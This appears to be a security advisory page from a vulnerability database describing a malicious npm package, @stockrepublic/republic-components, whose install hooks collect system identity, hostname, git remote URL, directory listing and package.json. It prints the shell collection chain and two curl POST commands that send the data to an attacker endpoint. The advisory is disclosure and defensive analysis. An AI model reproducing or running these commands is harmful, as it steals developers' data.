VDB

GCVE-110-OSM-2026-4691

GCVE-110-OSM-2026-4691
Advisory PublishedCVSS 8.8/10
Vulnetix · Advisory published May 25, 2026
Exfiltrates user identity, hostname, git repository remote URL, source directory listing, and project package.json to attacker-controlled endpoint https://o5i.cc/supp via two curl POST requests executed silently at install time. Both preinstall and install hooks invoke the payload, triggering double execution. The package description openly declares hostile intent as cover for the reconnaissance operation. **Trigger** (`preinstall` + `install`): both hooks execute `node index.js` at install time. **Collection**: `execSync` shell chain in `loaders/index.js` runs: `id > log.txt; ls -la src/ >> log.txt; hostname >> log.txt; git config --get remote.origin.url >> log.txt; cat package.json >> log.txt` — aggregating user identity, directory listing, machine hostname, git remote URL, and project manifest into `log.txt`. **Exfiltration**: `curl -X POST -F "file=@log.txt" https://o5i.cc/supp` uploads the full log; a second call `curl -X POST -d "$(id)" https://o5i.cc/supp` sends the user identity string directly in the POST body. **Decoy**: writes `git.log` to the consumer project root to match the declared package description.

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknown@stockrepublic/republic-components100.0.0 (affected)

Browse GCVE Records

73,393 records in the GCVE database · Updated July 17, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›